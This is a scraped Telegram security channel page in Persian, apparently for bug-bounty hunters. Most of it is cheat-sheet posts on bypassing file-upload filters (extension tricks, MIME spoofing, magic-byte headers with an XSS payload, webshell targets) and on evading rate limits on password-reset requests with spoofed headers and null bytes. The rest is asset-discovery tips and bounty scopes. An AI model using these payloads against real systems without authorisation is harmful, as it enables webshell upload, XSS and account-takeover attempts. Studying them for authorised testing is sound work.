CyberSecurity – Telegram
CyberSecurity
901 subscribers
122 photos
26 videos
73 files
145 links
Welcome to dark hell

‌ ما از دانش خود برای مهندسی دنیایی امن ‌تر استفاده می‌کنیم 🔐
Download Telegram
نکاتی برای دور زدن محدودیدت آپلود فایل:

🔹 تغییر پسوند فایل ها

۱- افزودن کارکترهای خاص به انتهای پسوند فایل
مثال:
file.php%20
file.php%0a
file.php%00
file.php%0d%0a
file.php/
file.php.\
file.
file.php….
file.pHp5….

۲- استفاده از پسوند های دوگانه
مثال:
file.png.php
file.png.pHp5

۳- استفاده از نال بایت و داده جانک
مثال:
shell.php%00.jpg
shell.php%0delete0.jpg
file.phpJunk123png

۴- استفاده از حروف کوچک و بزرگ
مثال:
file.jPg
file.SvG
file.asP

۵- استفاده از HTTP Parameter Pollution در نام فایل
مثال:
filename=1.jpg&filename=.php

🔹 دور زدن اعتبارسنجی مقدار content-type با تغییر MIME type
مثال:
تبدیل
Content-type: application/x-php
به
Content-type: image/jpeg


🔹 دور زدن اعتبار سنجی هدر فایل
۱- فیلتر های بررسی کننده هدرfile signatures معمولا صحت ۴ بایت اول آن را مورد بررسی قرار می دهند که می توان بعد از آن کد مخرب را قرار داد
مثال:
-----------------------------6683303835495
Content-Disposition: form-data; name="upload"; filename="badfile.''gif"
Content-Type: image/png

GIF8
<html><noscript>alert('XSS is easy');</noscript></html>
-----------------------------6683303835495--

لیست هدرfile signatures:
https://en.wikipedia.org/wiki/List_of_file_signatures

۲- استفاده از CRLF در محتوای فایل
مثال:
x.png%22%0d%0a%0d%0a%0d%0a<noscript>alert(1)</noscript>

🔹در پایان لیستی آورده شده است که با کمک آن می توان فهمید  پسوند های مختلف فایل به چه حملاتی می تواند منجر شود:
SVG: Stored XSS / SSRF / XXE
HTML / JS : HTML injection / XSS / Open redirect
ASP / ASPX / PHP5 / PHP / PHP3: Webshell / RCE
GIF: Stored XSS / SSRF
CSV: CSV injection
PNG / JPEG: Pixel flood attack (DoS)
ZIP: RCE via LFI / DoS
PDF / PPTX: SSRF / BLIND XXE
XML: XXE
AVI: LFI / SSRF

اطلاعات بیشتر در:
https://infosecwriteups.com/all-about-unrestricted-file-upload-a4ecf243b86b
https://anotherhackerblog.com/exploiting-file-uploads-pt1/
https://book.hacktricks.xyz/pentesting-web/file-upload
👌4😈2
#Idor testing
👍3
برای دور زدن rate limit می توان از روش های زیر استفاده کرد:

۱- افزودن header های سفارشی زیر
X-Forwarded-For : 127.0.0.1
X-Forwarded-Host : 127.0.0.1
X-Client-IP : 127.0.0.1
X-Remote-IP : 127.0.0.1
X-Remote-Addr : 127.0.0.1
X-Host : 127.0.0.1
مثال:
POST /ForgotPass.php HTTP/1.1
Host: target.com
X-Forwarded-For : 127.0.0.1
[...]

email=victim@gmail.com


۲- افزودن نال بایت (%00) و یا CLRF(%09, %0d, %0a) به انتهای مقدار پارامتر مورد نظر
مثال:
POST /ForgotPass.php HTTP/1.1
Host: target.com
[...]

email=victim@gmail.com%00

۳-تغییر IP یا کوکی ها یا user-agent
مثال:
POST /ForgotPass.php HTTP/1.1
Host: target.com
Cookie: xxxxxxxxxx
[...]

email=victim@gmail.com
که به صورت زیر استفاده می شود:
POST /ForgotPass.php HTTP/1.1
Host: target.com
Cookie: aaaaaaaaaaaaa
[...]

email=victim@gmail.com

۴- افزودن مقدار تصادفی به انتهای endpoint
مثال:
POST /ForgotPass.php HTTP/1.1
Host: target.com
[...]

email=victim@gmail.com
که به صورت زیر استفاده می شود:
POST /ForgotPass.php?random HTTP/1.1
Host: target.com
[...]

email=victim@gmail.com

۵- افزودن space به انتهای مقدار پارامتر
مثال:
POST /api/forgotpass HTTP/1.1
Host: target.com
[...]

{"email":"victim@gmail.com"}
که به صورت زیر استفاده می شود:
POST /api/forgotpass HTTP/1.1
Host: target.com
[...]

{"email":"victim@gmail.com "}
👌3👍1
سید بنواز که عالی مینوازی امروز😂
👍2
This media is not supported in your browser
VIEW IN TELEGRAM
ایلان ماسک: تراشه جدید ما می‌تونه به افراد نابینا، قدرت بینایی بده.

💡 ایلان ماسک، مدیرعامل Neuralink در رویداد Show and Tell اعلام کرد که با تراشه‌های این شرکت می‌توان به افراد با مشکلات بینایی کمک کرد و حتی بینایی را به افرادی که از ابتدا نابینا بودند هم برگرداند.

دانش و تکنولوژی (معجزه بشر) نابینایان رو بینا خواهد کرد.

نکته: آنها بینایی و ما بینش را با صیانت فراهم خواهیم کرد.
@matitanium
برا همه هانترای چنل ...😂🤤
😈41👍1
Forwarded from Deleted Account
new @asset find _
Domain: https://ww31.corporate-walmart.com
ip : 208.91.196.94
status-code: 200
Forwarded from Deleted Account
new @asset find _
Domain: https://ww17.corporate-walmart.com
ip : 208.91.196.95
status-code: 200
asset discovery --> find ip(DNSX and etc...) --> cut cdn --> httpx --> check manually -> = easy vulnerablity 😈


یه فلو تویه mass hunting 😉
😈1
uncover from project discovery👍
today tip:
some times original ip leaked in history👍
like: securityTrials👌
@matitanium
Forwarded from Deleted Account
Hi
New Wide company join in bug bounty:D

scope: *.tokensvc.com
👍1
information disclosure doork
xss
اینم امشب تا ببینیم چطور پیش میره😂
😈1